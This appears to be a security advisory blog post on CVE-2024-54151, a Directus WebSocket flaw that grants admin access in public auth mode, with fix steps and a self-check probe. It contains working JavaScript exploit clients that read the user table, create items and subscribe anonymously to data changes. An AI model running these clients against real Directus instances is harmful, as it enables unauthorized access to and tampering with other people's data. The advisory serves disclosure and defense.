CVE-2024-54151 - Critical Directus WebSockets Vulnerability—How Unauthenticated Users Can Become Admins
Directus is a popular open-source platform that turns any SQL database into a powerful real-time API and user-friendly admin dashboard. With Directus, teams can manage content in MySQL, PostgreSQL, and other SQL databases without writing a single line of SQL code. Its flexibility and modern design have made it a favorite for many developers and companies worldwide.
But as with any fast-moving software, vulnerabilities can slip through the cracks. CVE-2024-54151 is a prime example: this critical flaw allows anyone, even without authentication, to take full admin actions via WebSockets whenever WebSocket authentication is set to public mode. Let's break it down in simple terms, show you exactly what went wrong, and help you check if you're at risk.
What is CVE-2024-54151?
This critical vulnerability affects Directus versions 11.0.0 up to (but not including) 11.3.0. The root of the problem is simple: when the environment variable WEBSOCKETS_GRAPHQL_AUTH or WEBSOCKETS_REST_AUTH is set to "public", a WebSocket connection that should have been limited to the Public role's permissions is instead treated as an administrator. That means unauthenticated visitors can read, write, update, delete, and subscribe to real-time changes in your data, as if they owned the place.
The two settings involved are:
- WEBSOCKETS_GRAPHQL_AUTH (GraphQL subscriptions, default path /graphql)
- WEBSOCKETS_REST_AUTH (REST operations over WebSocket, default path /websocket)
Both accept strict, handshake (the default) or public. Public mode is a supported feature, not a debug switch: it lets anonymous clients connect and is supposed to grant them only what the Public role allows. On affected versions that limitation is skipped entirely, so every request on the connection runs with admin-level access.
How the Exploit Works (With Code Example)
Let's put this in real-world terms. Imagine you're running a business site on Directus and, so that anonymous visitors can receive live updates, you launch with WebSockets enabled (WEBSOCKETS_ENABLED=true) and one of the following in your .env file:
```
WEBSOCKETS_GRAPHQL_AUTH=public
```
or
```
WEBSOCKETS_REST_AUTH=public
```
Now, an attacker can open a WebSocket connection and perform any action, like listing all users or deleting content, without logging in.
1. Exploiting via the REST WebSocket
Let's say your Directus REST WebSocket endpoint is at its default path, wss://yourdomain.com/websocket. An attacker can use plain JavaScript in a browser console or a tool like wscat to connect and, without ever sending an auth message, request the system users collection:
```javascript
// Attacker's client. No auth message is sent at all; on an affected
// version in public mode the request still runs with admin-level access.
const socket = new WebSocket('wss://yourdomain.com/websocket');

socket.onopen = () => {
  // REST-over-WebSocket "items" operation: read from directus_users
  socket.send(JSON.stringify({
    type: 'items',
    action: 'read',
    collection: 'directus_users',
    query: { fields: ['id', 'email', 'role'] },
    uid: '1', // optional request id, echoed back in the reply
  }));
};

socket.onmessage = (event) => {
  const msg = JSON.parse(event.data);
  if (msg.type === 'ping') {            // server keepalive; reply so the connection stays open
    socket.send(JSON.stringify({ type: 'pong' }));
    return;
  }
  console.log('Received:', msg);        // { type: 'items', data: [ { id, email, role }, ... ], uid: '1' }
};
```
With this, they get the full user list, including emails and roles, no password needed.
Or the attacker can create a new item in a collection, say posts, again without any auth token:
```javascript
const socket = new WebSocket('wss://yourdomain.com/websocket');

socket.onopen = () => {
  // "items" create operation against an arbitrary collection
  socket.send(JSON.stringify({
    type: 'items',
    action: 'create',
    collection: 'posts',
    data: {
      title: "I’m an attacker!",
      content: "This was created without authorization."
    },
    uid: '2',
  }));
};

socket.onmessage = (event) => {
  console.log('Received:', event.data); // the created item on success, or { status: 'error', ... }
};
```
Attackers can do anything: modify or delete collections, create admin users, subscribe to data changes, and more.
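The same exposure also applies to the GraphQL WebSocket, which the examples above do not cover. The following is an added example, not code from this page or from the Directus project: it walks through the graphql-transport-ws exchange (connection_init, connection_ack, subscribe, next) that Directus uses for subscriptions, sending no token at all. The endpoint path /graphql, the subprotocol name, the <collection>_mutated subscription naming, and the collection named posts are assumptions based on the Directus realtime documentation, not facts stated in the advisory.

```javascript
// Added example (not Directus code): anonymous GraphQL subscription against a
// Directus instance running WEBSOCKETS_GRAPHQL_AUTH=public. Assumes the default
// GraphQL WebSocket path /graphql and the graphql-transport-ws subprotocol;
// "posts" is a made-up collection name.
const GRAPHQL_WS_URL = 'wss://yourdomain.com/graphql';

// graphql-transport-ws opens with connection_init. An authenticated client would
// put an access_token in the payload; in public mode the attacker sends nothing.
function connectionInit() {
  return { type: 'connection_init', payload: {} };
}

// Directus exposes one subscription per collection, named <collection>_mutated,
// yielding the changed key, the event (create/update/delete) and the row data.
function subscribeMessage(id, collection, fields) {
  return {
    id,
    type: 'subscribe',
    payload: {
      query: `subscription { ${collection}_mutated { key event data { ${fields.join(' ')} } } }`,
    },
  };
}

// Interpret one server frame and return a small record the caller can act on.
function handleFrame(raw) {
  const msg = JSON.parse(raw);
  switch (msg.type) {
    case 'connection_ack': return { kind: 'ack' };
    case 'ping':           return { kind: 'ping', reply: { type: 'pong' } };
    case 'next':           return { kind: 'data', id: msg.id, data: msg.payload?.data };
    case 'error':          return { kind: 'error', id: msg.id, errors: msg.payload };
    case 'complete':       return { kind: 'complete', id: msg.id };
    default:               return { kind: 'unknown', raw: msg };
  }
}

// Drive the exchange: init, wait for ack, subscribe, then log every mutation
// the server pushes to a client that never authenticated.
function watch(url = GRAPHQL_WS_URL, collection = 'posts', fields = ['id', 'title']) {
  const ws = new WebSocket(url, 'graphql-transport-ws');
  ws.onopen = () => ws.send(JSON.stringify(connectionInit()));
  ws.onmessage = (ev) => {
    const r = handleFrame(ev.data);
    if (r.kind === 'ack')   ws.send(JSON.stringify(subscribeMessage('1', collection, fields)));
    if (r.kind === 'ping')  ws.send(JSON.stringify(r.reply));
    if (r.kind === 'data')  console.log('mutation seen anonymously:', JSON.stringify(r.data));
    if (r.kind === 'error') console.log('server refused the subscription:', JSON.stringify(r.errors));
  };
  return ws;
}

// Only connects when explicitly pointed at a target, e.g.
// DIRECTUS_GRAPHQL_WS_URL=wss://yourdomain.com/graphql node watch.js
if (process.env.DIRECTUS_GRAPHQL_WS_URL) watch(process.env.DIRECTUS_GRAPHQL_WS_URL);
```

On a patched instance in public mode the same exchange still succeeds, but the server only pushes rows the Public role is allowed to read, and an error frame comes back for collections it cannot. That difference is the whole fix.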
Why is This So Dangerous?
- Zero authentication required: No login, no password, no token. Anyone can connect and take admin actions.
- All CRUD operations: Create, read, update, and delete across all collections, including system collections such as directus_users.
- Bypasses all permissions: Even if your Directus roles are perfectly configured, this setting nullifies them for WebSocket traffic.
Who is Affected?
Anyone running Directus 11.0.0 through 11.2.x with WebSockets enabled and either WEBSOCKETS_GRAPHQL_AUTH or WEBSOCKETS_REST_AUTH set to public. The default mode (handshake) and strict mode both require a valid token before any request is processed and are not affected, and versions before 11.0.0 are outside the affected range.
How to Fix It
Update immediately to v11.3.0 or later
Directus maintainers released version 11.3.0, which fixes this issue by giving WebSocket connections in public mode the permissions of the Public role instead of unrestricted access.
> Upgrade Guide:
> 1. Update your Directus instance
>
> ```bash
> npm install directus@latest
> # or update your Docker image (in production, pin to 11.3.0 or later rather than trusting :latest)
> docker pull directus/directus:latest
> ```
>
> 2. Decide whether you really need anonymous WebSocket clients. If not, set WEBSOCKETS_GRAPHQL_AUTH and WEBSOCKETS_REST_AUTH to handshake (the default) or strict instead of public. After the upgrade public mode is safe again, but it still exposes everything the Public role is allowed to see.
> 3. Restart your application.
If you cannot upgrade right away, switch both variables away from public (handshake or strict), or disable WebSockets entirely with WEBSOCKETS_ENABLED=false, and restart. Then verify from outside your network with wscat:
```bash
npx wscat -c wss://yourdomain.com/websocket
```
Once connected, paste an unauthenticated read request for directus_users (type items, action read, no auth message first). A correctly configured or patched instance closes the connection or replies with an error; if rows come back, anonymous clients can still read your user table.
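To make that check repeatable across many instances, here is a small self-check, added as an example that is neither this page's nor Directus' own code. It combines the version window from the advisory, the environment settings discussed above, and the reply an unauthenticated REST-over-WebSocket read gets back. The default values it assumes for WEBSOCKETS_ENABLED (false) and for the two auth variables (handshake) come from the Directus environment-variable documentation and should be verified against your version; the sample replies in the test are constructed; the live probe only runs when DIRECTUS_WS_URL is set.

```javascript
// Added example (not Directus code): decide whether a deployment is exposed to
// CVE-2024-54151 from its version, its env settings, and a live unauthenticated probe.

// Affected window from the advisory: 11.0.0 <= version < 11.3.0.
function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)/.exec(String(v).trim());
  if (!m) throw new Error(`unparseable version: ${v}`);
  return [Number(m[1]), Number(m[2]), Number(m[3])];
}
function compareVersions(a, b) {
  for (let i = 0; i < 3; i++) if (a[i] !== b[i]) return a[i] < b[i] ? -1 : 1;
  return 0;
}
function versionAffected(version) {
  const v = parseVersion(version);
  return compareVersions(v, [11, 0, 0]) >= 0 && compareVersions(v, [11, 3, 0]) < 0;
}

// Env check. Defaults (WebSockets off, both auth modes "handshake") are
// assumptions taken from the Directus environment-variable docs.
function configExposed(env) {
  const get = (k, dflt) => String(env[k] ?? dflt).trim().toLowerCase();
  if (get('WEBSOCKETS_ENABLED', 'false') !== 'true') return false;
  const restPublic = get('WEBSOCKETS_REST_ENABLED', 'true') === 'true'
    && get('WEBSOCKETS_REST_AUTH', 'handshake') === 'public';
  const gqlPublic = get('WEBSOCKETS_GRAPHQL_ENABLED', 'true') === 'true'
    && get('WEBSOCKETS_GRAPHQL_AUTH', 'handshake') === 'public';
  return restPublic || gqlPublic;
}

function isVulnerable(version, env) {
  return versionAffected(version) && configExposed(env);
}

// The probe: an unauthenticated read of directus_users over the REST WebSocket.
const PROBE = {
  type: 'items', action: 'read', collection: 'directus_users',
  query: { fields: ['id', 'email', 'role'], limit: 1 },
  uid: 'cve-2024-54151-probe',
};

// Classify one server frame. Directus answers an items read with
// { type: "items", data: [...] } and a refusal with { status: "error", error: {...} }.
function classifyReply(raw) {
  const msg = typeof raw === 'string' ? JSON.parse(raw) : raw;
  if (msg.type === 'ping') return 'ping';                         // keepalive; answer and keep waiting
  if (msg.status === 'error') return 'denied';
  if (msg.type === 'items' && Array.isArray(msg.data)) return 'exposed';
  return 'unknown';
}

// Live probe; needs a WebSocket client (Node 22+ global, or pass the `ws` package's class).
function probe(url, { timeoutMs = 5000, WebSocketImpl = globalThis.WebSocket } = {}) {
  return new Promise((resolve) => {
    const ws = new WebSocketImpl(url);
    let timer;
    const finish = (verdict) => {
      clearTimeout(timer);
      resolve(verdict);                 // later calls are no-ops
      try { ws.close(); } catch {}
    };
    timer = setTimeout(() => finish('no_reply'), timeoutMs);
    ws.onopen = () => ws.send(JSON.stringify(PROBE));
    ws.onmessage = (ev) => {
      const verdict = classifyReply(ev.data);
      if (verdict === 'ping') { ws.send(JSON.stringify({ type: 'pong' })); return; }
      finish(verdict);
    };
    ws.onerror = () => finish('refused');   // strict mode rejects the upgrade outright
    ws.onclose = () => finish('denied');    // handshake mode drops clients that never authenticate
  });
}

// e.g. DIRECTUS_WS_URL=wss://yourdomain.com/websocket node check.js
if (process.env.DIRECTUS_WS_URL) {
  probe(process.env.DIRECTUS_WS_URL).then((v) => console.log(`${process.env.DIRECTUS_WS_URL}: ${v}`));
}
```

Read the two results together: "exposed" on a version inside the window is the CVE; "exposed" on 11.3.0 or later means the Public role itself has been granted read access to directus_users, which is a permissions mistake rather than this bug, but one you still want to fix.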
References and Resources
- Directus Security Advisory for CVE-2024-54151
- Directus Release Notes v11.3.0
- Directus Documentation - Environment Variables
- NIST CVE entry for CVE-2024-54151
Summary
CVE-2024-54151 is a dangerous "simple setting, total compromise" type of bug. By setting a single .env variable to public, you open your entire Directus instance, including user data and configuration, to the world. If you use Directus 11, upgrade to 11.3.0 or later right now and check your WebSocket authentication settings. Protect your data, your reputation, and your users.
Timeline
Published on: 12/09/2024 21:15:08 UTC
Last modified on: 12/10/2024 18:15:42 UTC